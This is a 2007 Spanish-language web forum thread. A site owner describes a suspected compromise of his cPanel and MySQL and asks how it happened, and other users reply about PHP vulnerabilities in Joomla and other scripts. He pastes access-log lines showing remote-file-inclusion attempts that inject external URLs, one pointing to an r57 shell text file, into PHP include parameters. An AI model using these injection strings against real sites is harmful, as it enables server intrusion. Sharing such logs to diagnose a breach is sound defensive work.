Foros del web, para los que viven de bits

Anarko · 02-sep-2007, 12:03

Hola,

hace semanas NO entraba a mi cPanel...

Accedi al PhpMyAdmin para ver unas cosas...

Oh carambas!!, tengo IP dedicada para la conección!.

Al acceder al cPanel veo que alguien ha agregado una IP a las conexiones REMOTAS de MySQL...

Busco en los LOGS de acceso y descubro que esa IP ha intentado acceder a mi web con vars como:

Código PHP:


			
coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?



hosting  coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?



/phpPgAdmin/sqledit.php?server=http://members.lycos.nl/pspmusicfeed/id.txt?



/include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?



Etc...

La IP es de KOREA...

Ademas os digo:

Núnca agrego Conex remotas a MySQL... (Y tengo IP FIJA para Internet)...

Es un BUG de PhpMyAdmin?
Es un BUG de cPanel?
Con exploits a PHP pueden haber agregado ESA IP a mi sistema ?

Que pesadilla!!!....

cincinnati · 03-sep-2007, 03:13

Cita:

Con exploits a PHP pueden haber agregado ESA IP a mi sistema

Sí, por supuesto. Explotando agujeros de php (tipo joomlas obsoletos, phpbb, oscommerce, etc, etc) no es muy complicado para un hacker acceder a tu sistema y hacer lo que quiera.

rcalle66 · 03-sep-2007, 04:12

Me sucedio hace algún tiempo y fue por un módulo de joomla llamado ext_calendar; pero ellos no accedieron a mi cpanel y en tu caso al parecer si;

02-sep-2007, 12:03	#1 (permalink)
Anarko Fecha de Ingreso: febrero-2004 Mensajes: 1.121	Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder? Hola, hace semanas NO entraba a mi cPanel... Accedi al PhpMyAdmin para ver unas cosas... Oh carambas!!, tengo IP dedicada para la conección!. Al acceder al cPanel veo que alguien ha agregado una IP a las conexiones REMOTAS de MySQL... Busco en los LOGS de acceso y descubro que esa IP ha intentado acceder a mi web con vars como: Código PHP: `coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http: flackster.org photos myadmin temp ., ., ., r57.txt? hosting coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http: flackster.org photos myadmin temp ., ., ., r57.txt? /phpPgAdmin/sqledit.php?server=http://members.lycos.nl/pspmusicfeed/id.txt? /include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? Etc...` La IP es de KOREA... Ademas os digo: Núnca agrego Conex remotas a MySQL... (Y tengo IP FIJA para Internet)... Es un BUG de PhpMyAdmin? Es un BUG de cPanel? Con exploits a PHP pueden haber agregado ESA IP a mi sistema ? Que pesadilla!!!.... __________________ Salu2!, Microsoft utiliza PHP, yo no lo sabia tu?

03-sep-2007, 03:13	#2 (permalink)
cincinnati Fecha de Ingreso: noviembre-2002 Ubicación: S Mensajes: 647	Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder? Cita: Con exploits a PHP pueden haber agregado ESA IP a mi sistema Sí, por supuesto. Explotando agujeros de php (tipo joomlas obsoletos, phpbb, oscommerce, etc, etc) no es muy complicado para un hacker acceder a tu sistema y hacer lo que quiera. __________________ Santoral de hoy: San Petronio (creo)

03-sep-2007, 04:12	#3 (permalink)
rcalle66 Fecha de Ingreso: agosto-2007 Mensajes: 668	Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder? Me sucedio hace algún tiempo y fue por un módulo de joomla llamado ext_calendar; pero ellos no accedieron a mi cpanel y en tu caso al parecer si;

Herramientas
Mostrar Versión Imprimible Enviar por Correo
Desplegado
Mode Lineal Cambiar a Modo Hibrido Cambiar a Modo Hilado